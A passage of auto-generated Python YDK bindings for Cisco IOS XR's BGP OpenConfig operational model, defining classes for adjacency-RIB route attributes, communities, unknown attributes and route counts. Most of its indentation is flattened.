                ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
                ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
                ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
            ])
            self.afi = None
            self.ipv4_address = None
            self.ipv6_address = None
            self._segment_path = lambda: "prefix"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName']['meta_info']
# Generated binding for the route-attr-list container under adj-rib-in-post.
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
# YANG module prefix and revision this class was generated from.
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2 requires the fully-qualified super() form; Python 3 can use the bare call.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Child containers keyed by YANG name -> (python attribute, binding class).
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community))])
# Leaf descriptors: python attribute -> (YLeaf(type, yang-name), accepted python types).
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
# Eagerly instantiate singleton child containers and parent-link them.
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
# community is a YANG list, so it is a YList rather than a single child instance.
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
# Set last: presumably gates subsequent writes through _perform_setattr — confirm in ydk _Entity_.
self._is_frozen = True
# Route attribute writes through _Entity_ validation for the declared leaf names.
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
# Next-hop address (AFI discriminated union of IPv4/IPv6 leafs).
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop']['meta_info']
# NOTE: 'Aggregrator' spelling follows the YANG node name "aggregrator-attributes"; do not "fix" it here.
class AggregratorAttributes(_Entity_):
"""
AggregatorList
.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
# 'as' is a Python keyword, so the generated attribute is 'as_'.
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
# One element of the community array (a single opaque string leaf).
class Community(_Entity_):
"""
CommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
# Meta info for RouteAttrList itself (lazy import of the meta table).
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList']['meta_info']
# Generated binding for the ext-attributes-list container under adj-rib-in-post.
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
# YANG module prefix and revision this class was generated from.
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2 requires the fully-qualified super() form; Python 3 can use the bare call.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Child list classes keyed by YANG name -> (python attribute, binding class).
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
# 'cluster' is a leaf-list, hence a plain Python list default.
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
# Set last: presumably gates subsequent writes through _perform_setattr — confirm in ydk _Entity_.
self._is_frozen = True
# Route attribute writes through _Entity_ validation for the declared leaf names.
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
# One element of the extended-community array (a single opaque string leaf).
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
# One unrecognized BGP path attribute: type, length, and hex-string value.
class UnknownAttributes(_Entity_):
"""
UnknownAttributes
.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
AttributeValue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
# Meta info for ExtAttributesList itself (lazy import of the meta table).
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList']['meta_info']
# Generated binding for the last-modified-date container (single string leaf).
class LastModifiedDate(_Entity_):
"""
LastModifiedDate
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2 requires the fully-qualified super() form; Python 3 can use the bare call.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
# Set last: presumably gates subsequent writes through _perform_setattr — confirm in ydk _Entity_.
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
# Lazy import: the generated meta table is large and only needed on demand.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate']['meta_info']
# NOTE: "Recieved" misspelling mirrors the YANG node name "last-update-recieved";
# it is part of the public interface and must not be corrected here.
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2 requires the fully-qualified super() form; Python 3 can use the bare call.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
# Set last: presumably gates subsequent writes through _perform_setattr — confirm in ydk _Entity_.
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
# Lazy import: the generated meta table is large and only needed on demand.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
# Meta info for the enclosing Route list entry (lazy import of the meta table).
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
# Meta info for the enclosing Routes container (lazy import of the meta table).
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes']['meta_info']
# NOTE(review): the docstring below says "out-bound", but this container lives under
# adj-rib-in-post (see yang_parent_name) — the text appears copied from the out-bound variant.
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
post\-policy table
.. attribute:: num_routes
NumRoutes
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2 requires the fully-qualified super() form; Python 3 can use the bare call.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "adj-rib-in-post"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
# Set last: presumably gates subsequent writes through _perform_setattr — confirm in ydk _Entity_.
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
# Lazy import: the generated meta table is large and only needed on demand.
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
# Meta info for the enclosing AdjRibInPost container (lazy import of the meta table).
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost']['meta_info']
class AdjRibOutPost(_Entity_):
"""
Adjacency rib out\-bound post\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2 requires the fully-qualified super() form; Python 3 can use the bare call.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost, self).__init__()
self.yang_name = "adj-rib-out-post"
self.yang_parent_name = "open-config-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Singleton child containers: routes and num-routes.
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes))])
# This container has no direct leafs of its own.
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "adj-rib-out-post"
# Set last: presumably gates subsequent writes through _perform_setattr — confirm in ydk _Entity_.
self._is_frozen = True
# No leafs here, so the allowed-attribute list is empty; writes still go through _Entity_ validation.
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
# Python 2 requires the fully-qualified super() form; Python 3 can use the bare call.
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "adj-rib-out-post"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Single child list class: the route entries.
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route))])
